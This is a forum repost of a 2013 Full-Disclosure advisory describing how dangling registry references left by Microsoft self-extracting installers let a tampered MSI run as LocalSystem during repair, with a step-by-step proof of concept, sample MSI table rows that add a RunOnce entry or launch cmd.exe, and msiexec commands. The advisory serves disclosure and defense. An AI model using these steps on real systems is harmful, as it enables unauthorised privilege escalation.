Jump to content
Nytro

Defense in depth -- the Microsoft way (part 10)

By Nytro, in Tutoriale in engleza

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Defense in depth -- the Microsoft way (part 10)

From: "Stefan Kanthak" <stefan.kanthak () nexgo de>

Date: Sat, 21 Sep 2013 23:06:13 +0200

Hi @ll,

all products, security patches and hotfixes distributed as self-

extracting packages (IExpress, "update.exe" etc.) which contain a

*.MSI or *.MSP leave dangling references to these files after their

installation.

"In certain situations ..." (see below) these dangling references

allow a privilege escalation.

Proof of concept (run on a fully patched Windows 7 SP1):

Step 0:

a) lögin as UNPRIVILEGED user.

Step 1:

a) download the IExpress package "CAPICOM-KB931906-v2102.exe" from

<http://www.microsoft.com/en-us/download/details.aspx?id=3207>

resp. <http://technet.microsoft.com/security/bulletin/ms07-028>

B) check/verify the Authenticode (digital) signature of the

downloaded "CAPICOM-KB931906-v2102.exe"

c) execute the downloaded "CAPICOM-KB931906-v2102.exe" (UAC will

ask for confirmation or prompt for administrative credentials):

* the IExpress installer unpacks its contents into the directory

"%TEMP%\IXP000.TMP\", calls MSIEXEC.EXE to install the unpacked

"capicom2.msi" and removes the temporary directory afterwards;

* MSIEXEC.EXE creates the following registry entries with dangling

references to the (later) deleted "capicom2.msi" in the removed

temporary directory:

[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList]

"PackageName"="capicom2.msi"

"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList\Media]

"DiskPrompt"="Security Update for CAPICOM (KB931906) Installation Disk"

"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\SourceList\Net]

"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Microsoft\Windows\CurrentVersion\Uninstall\{0EFDF2F9-836D-4EB7-A32D-038BD3F1FB2A}]

"InstallSource"="C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

Step 2:

a) extract "capicom2.msi" from "CAPICOM-KB931906-v2102.exe"

(see <http://support.microsoft.com/kb/197147> for instructions).

B) recreate the directory "%TEMP%\IXP000.TMP\".

c) copy the extracted "capicom2.msi" to "%TEMP%\IXP000.TMP\".

d) check/verify the Authenticode (digital) signature of

"%TEMP%\IXP000.TMP\capicom2.msi".

e) open "%TEMP%\IXP000.TMP\capicom2.msi" with the .MSI editor of

your choice and insert (for example) the following column into

its 'registry' table:

REGKEY0,2,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,OUCH!,cmd.exe /k echo %CMDCMDLINE%,COM2000

or (for example) the following column into its 'CustomAction'

table:

OUCH!,3122,cmd.exe,/k title %USERDOMAIN%\%USERNAME%

f) check the Authenticode signature of the modified "capicom2.msi":

it is INVALID now!

g) execute "MSIEXEC.EXE /A %TEMP%\IXP000.TMP\capicom2.msi"

and follow the dialogs.

Especially notice that NO warning/hint about the broken/invalid

Authenticode signature is displayed!

OUCH!

Step 3:

a) read <http://support.microsoft.com/kb/944298>:

| In certain situations, Setup cannot find the .msi file in the

| Windows Installer cache. In these situations, Setup tries to

| resolve the source location by testing for the presence of the

| product installation in the last-used location when Setup was

| last run. If Setup cannot resolve the source location, the user

| is prompted to provide the installation media.

B) determine the name of the cached .MSI file, for example via:

REG.EXE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData

\S-1-5-18\Products\9F2FDFE0D6387BE43AD230B83D1FBFA2\InstallProperties" /v "LocalPackage"

(its pathname is "%SystemRoot%\Installer\<random>.msi").

c) delete the cached .MSI file found in the substep before.

Yes, this needs administrative rights; but read MSKB 944298

again: "in certain situations ...".

I just enforce such a certain situation!

d) execute "MSIEXEC.EXE /fm {0EFDF2F9-836D-4EB7-A32D-038BD3F1FB2A}".

Again: NO warning/hint about the broken/invalid Authenticode

signature is displayed.

And: UAC does NOT prompt for confirmation or credentials!

If you added a column to the 'CustomAction' table CMD.EXE runs

and shows "NT AUTHORITY\SYSTEM" in its title bar.

e) execute

REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "OUCH!"

and conclude that the modified "%TEMP%\IXP000.TMP\capicom2.msi"

was run with administrative (really: "LocalSystem") privileges.

Timeline:

~~~~~~~~~

2008-04-09 informed vendor that MSKB 931906 creates dangling

references and MSIEXEC.EXE /f... prompts user for

location of capicom2.msi

2008-04-11 vendor asked: "have you tried removing the update via

Add/Remove Programs and then re-installing?"

2008-04-11 replied to vendor: that's NOT the point here

... no more answer!

2013-05-20 next try...

stay tuned

Stefan Kanthak

PS: as examples for other self-extracting packages use

"msxml4-KB2758694-enu.exe" and "msxml6-KB2758696-enu-x86.exe",

available from

<http://www.microsoft.com/en-us/download/details.aspx?id=36292> and

<http://www.microsoft.com/en-us/download/details.aspx?id=36316> resp.

<http://technet.microsoft.com/security/bulletin/MS13-002>,

which create the following registry entries:

[HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList]

"PackageName"="msxml6.msi"

"LastUsedSource"=expand:"n;1;c:\\c3d7dd340cec94ff5838ba93\\"

[HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList\Media]

"DiskPrompt"="[1]"

"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\745017A5E85BB88428D8ACA9520A35C3\SourceList\Net]

"1"=expand:"c:\\c3d7dd340cec94ff5838ba93\\"

Other products which exhibit the same problem are (not exhaustive, in

no particular order):

1. Microsoft Security Essentials

[HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList]

"PackageName"="dw20shared.msi"

"LastUsedSource"=expand:"n;1;c:\\62bf30c6a367eb52738a55\\x86\\"

[HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList\Media]

"DiskPrompt"="Microsoft Application Error Reporting"

"1"="OFFICE12;1"

[HKEY_CLASSES_ROOT\Installer\Products\000021599B0090400000000000F01FEC\SourceList\Net]

"1"=expand:"c:\\62bf30c6a367eb52738a55\\x86\\"

"2"=expand:"C:\\Program Files\\Microsoft Security Client\\Backup\\"

[HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList]

"PackageName"="epp.msi"

"LastUsedSource"=expand:"n;1;c:\\0d149c673ede07404629f38d05a7\\x86\\"

[HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList\Media]

"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\BB8DD09375BB24940A92D219E3E4D947\SourceList\Net]

"1"=expand:"C:\\0d149c673ede07404629f38d05a7\\x86\\"

"2"=expand:"C:\\Program Files\\Microsoft Security Client\\Backup\\"

2. .NET Framework 1.1

[HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList]

"PackageName"="netfx.msi"

"LastUsedSource"=expand:"n;1;C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList\Media]

"DiskPrompt"="[1]"

"1"=";Microsoft .NET Framework 1.1 [Disk 1]"

...

"21"="URTSTDD1;Microsoft .NET Framework 1.1 [Disk 1]"

...

[HKEY_CLASSES_ROOT\Installer\Products\DDE7F2BCF1D91C3409CFF425AE1E271A\SourceList\Net]

"1"=expand:"C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList]

"PackageName"="tmp517.tmp"

"LastUsedSource"=expand:"n;1;C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList\Media]

"DiskPrompt"="[1]"

"20872"=";Microsoft .NET Framework 1.1 Service Pack 1 (KB867460)"

[HKEY_CLASSES_ROOT\Installer\Patches\7FCDE114D557E4147AB4D3DC56385F98\SourceList\Net]

"1"=expand:"C:\\DOCUME~1\\Owner\\LOCALS~1\\Temp\\IXP000.TMP\\"

...

3. Visual C++ 2005 Redistributable 8.0.56336

[HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList]

"PackageName"="vcredist.msi"

"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList\Media]

1=";Microsoft Visual C++ 2005 Redistributable [Disk 1]"

DiskPrompt="[1]"

[HKEY_CLASSES_ROOT\Installer\Products\b25099274a207264182f8181add555d0\SourceList\Net]

"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\"

4. Visual C++ 2005 Redistributable (x64) 8.0.59192

"PackageName"="vcredist.msi"

"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP001.TMP\\"

5. Visual C++ 2005 Redistributable (x64) 8.0.61000

"PackageName"="vcredist.msi"

"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

6. Virtual PC 2007 Service Pack 1

[HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList]

"PackageName"="Virtual_PC_2007_Install.msi"

"LastUsedSource"="n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList\Media]

"1"=";"

[HKEY_CLASSES_ROOT\Installer\Products\899384DAA9E2504438FFE605A34FC9BB\SourceList\Net]

"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList]

"PackageName"="KB958162.msp"

"LastUsedSource"=expand:"n;1;C:\\Users\\Owner\\Downloads\\"

[HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList\Media]

"100"=";"

[HKEY_CLASSES_ROOT\Installer\Patches\F932FFF94C172E04DAC6E2E68C62E958\SourceList\Net]

"1"=expand:"C:\\Users\\Owner\\Downloads\\"

"2"=expand:"PatchSourceList"

7. Windows Media Player Firefox Plugin

[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList]

"PackageName"="ffplugin.msi"

"LastUsedSource"="n;1;C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList\Media]

"DiskPrompt"="Windows Media Player Firefox Plugin Installation"

"1"=";CD-ROM #1"

[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BBFDF96D153C8B4988D68D79C0D2A4A\SourceList\Net]

"1"=expand:"C:\\Users\\Owner\\AppData\\Local\\Temp\\IXP000.TMP\\"

_______________________________________________

Full-Disclosure - We believe in it.

Charter: [Full-Disclosure] Mailing List Charter

Hosted and sponsored by Secunia - Computer Security - Software & Alerts - Secunia

Sursa: Full Disclosure: Defense in depth -- the Microsoft way (part 10)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...